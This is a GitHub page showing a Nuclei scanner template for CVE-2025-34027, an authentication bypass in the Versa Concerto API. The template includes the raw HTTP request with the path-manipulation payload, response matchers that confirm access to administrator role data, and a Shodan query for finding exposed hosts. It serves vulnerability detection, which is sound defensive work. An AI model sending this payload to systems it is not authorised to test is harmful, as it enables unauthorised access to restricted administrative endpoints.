forked from projectdiscovery/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2025-34027.yaml
More file actions
48 lines (44 loc) · 1.76 KB
/
CVE-2025-34027.yaml
File metadata and controls
48 lines (44 loc) · 1.76 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
id: CVE-2025-34027
info:
name: Versa Concerto API Path Based - Authentication Bypass
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: critical
description: |
Authentication bypass in the Versa Concerto API, caused by URL decoding inconsistencies. It allowed unauthorized access to certain API endpoints by manipulating the URL path.This issue enabled attackers to bypass authentication controls and access restricted resources.
impact: |
Attackers can bypass authentication through URL path manipulation to access restricted API endpoints and retrieve sensitive role information without credentials.
remediation: |
Upgrade to the latest Versa Concerto version that properly handles URL decoding and path validation in authentication checks.
reference:
- https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
- https://versa-networks.com/documents/datasheets/versa-concerto.pdf
- https://www.cve.org/CVERecord?id=CVE-2025-34027
- https://security-portal.versa-networks.com/emailbulletins/6830fa3f28defa375486ff2f
classification:
cve-id: CVE-2025-34027
cwe-id: CWE-367
epss-score: 0.04011
epss-percentile: 0.88257
cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: versa-networks
product: concerto
max-request: 1
shodan-query: http.favicon.hash:-534530225
tags: cve,cve2025,versa,concerto,auth-bypass,vkev,vuln
http:
- raw:
- |
GET /portalapi/v1/roles/option;%2fv1%2fping HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- ENTERPRISE_ADMINISTRATOR
- type: word
part: header
words:
- EECP-CSRF-TOKEN